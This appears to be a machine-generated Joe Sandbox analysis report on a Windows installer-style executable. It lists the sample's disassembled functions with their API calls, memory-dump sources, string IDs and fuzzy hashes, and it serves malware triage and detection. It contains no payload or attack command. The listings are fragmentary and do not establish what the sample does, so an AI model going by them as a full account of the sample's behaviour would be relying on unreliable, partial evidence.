                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 5e3acc7ed2542ba51d8a20c3bb224dd4a4199dc3c67067a594cf7fca80444e6d
                                                                        • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                        • Opcode Fuzzy Hash: 5e3acc7ed2542ba51d8a20c3bb224dd4a4199dc3c67067a594cf7fca80444e6d
                                                                        • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004042CC Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                        • GetSysColor.USER32(?), ref: 004043AC
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                        • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                        • SendMessageW.USER32(00000000), ref: 0040444F
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                        • SetCursor.USER32(00000000), ref: 004044CE
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                        • SetCursor.USER32(00000000), ref: 004044F2
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: CB@$ExecToStack$N$open
                                                                        • API String ID: 3615053054-100886567
                                                                        • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                        • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                        • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                        • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405C08 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C18
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                        • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                          • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                          • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                        • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                        • wsprintfA.USER32 ref: 00405C80
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                          • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
                                                                          • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                        • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                        • API String ID: 1265525490-3322868524
                                                                        • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                        • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                        • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                        • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                        • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                        • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                        • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001968 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(00000400), ref: 10001998
                                                                        • lstrcpynW.KERNEL32(?,00000000), ref: 100019A6
                                                                        • CharNextW.USER32(00000022), ref: 100019D3
                                                                        • CharNextW.USER32(00000022), ref: 100019DE
                                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 10001A03
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10001A15
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 10001A22
                                                                        • CloseHandle.KERNEL32(?), ref: 10001A31
                                                                        • CloseHandle.KERNEL32(?), ref: 10001A36
                                                                        • ExitProcess.KERNEL32 ref: 10001A3B
                                                                        • ExitProcess.KERNEL32 ref: 10001A46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                                        • String ID: "$D
                                                                        • API String ID: 3771911414-1154559923
                                                                        • Opcode ID: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                                        • Instruction ID: 9e44c51dddde78ff0986a5ea86513d283f9c8b06d9e3fbca70b926d3284a145a
                                                                        • Opcode Fuzzy Hash: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                                        • Instruction Fuzzy Hash: FB214F7180025DFAFB10DBD0CD98AEFBBBDEB04385F504026E206B60A5DB701E85DBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040617E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3193094500
                                                                        • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                        • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                        • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                        • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404196 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                        • GetSysColor.USER32(00000000), ref: 004041CF
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                        • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                        • GetSysColor.USER32(?), ref: 004041FA
                                                                        • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                        • DeleteObject.GDI32(?), ref: 00404224
                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                        • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                        • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                        • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                          • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                        • String ID: 9
                                                                        • API String ID: 1149667376-2366072709
                                                                        • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                        • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                        • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                        • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID:
                                                                        • API String ID: 3294113728-0
                                                                        • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                        • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                        • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                        • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004024EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040252F
